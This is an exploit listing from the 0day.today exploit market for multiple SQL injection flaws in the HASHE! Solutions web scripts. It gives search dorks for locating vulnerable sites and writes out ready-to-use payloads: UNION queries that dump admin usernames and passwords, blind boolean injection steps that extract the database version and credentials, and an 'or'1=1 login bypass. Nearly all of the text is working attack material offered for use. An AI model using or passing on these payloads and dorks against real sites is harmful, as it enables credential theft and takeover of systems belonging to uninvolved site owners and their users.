[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HASHE! Solutions Multiple SQL Injection Vulnerabilities

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10819
Category
web applications
Date add
10-02-2010
Platform
unsorted
=======================================================
HASHE! Solutions Multiple SQL Injection Vulnerabilities
=======================================================

HASHE! Multiple Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  
.:. Script         : HASHE
.:. Bug Type       : Sql Injection[Mysql]
.:. Dork           : [1] "Powered By HASHE"
                     [2] "Powered By HASHE!"
                     [3] "Powered By Hashe Computer Solutions"
 
####################################################################
 
    Sql Injection [MYSQL]
 
===[ Exploit ]===
 
www.site.com/home.php?id=37[Sql Injection]
www.site.com/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(username,0x3a,password),7/**/from/**/admin
 
 
www.site.com/bar_detail.php?id=null[Sql Injection]
www.site.com/bar_detail.php?id=null'/**/and/**/1=2/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/admin-- -
 
    Sql Injection [Blind]
 
===[ Exploit ]===
 
www.site.com/propertydetails.php?Id=null[BLIND]
 
www.site.com/propertydetails.php?Id=null+and+1=1   >>>  True
www.site.com/propertydetails.php?Id=null+and+1=2   >>>  False
 
www.site.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=4   >>>   True
www.site.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=5   >>>   False
 
www.site.com/propertydetails.php?Id=null+and+(select substring(concat(1,concat(name,0x3a,password)),1,1) from admin limit 0,1)=1
 
    Sql Injection [Auth Bypass]
 
===[ Exploit ]===
 
www.site.com/admin/
 
Bug Type: Bar Manager
Username: 'or'1=1
Passowrd: 'or'1=1
 
http://server/admin/
 
 
 
Script Site:
 
http://server/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat%28username,0x3a,password%29,7/**/from/**/admin
 
####################################################################



#  0day.today [2024-10-05]  #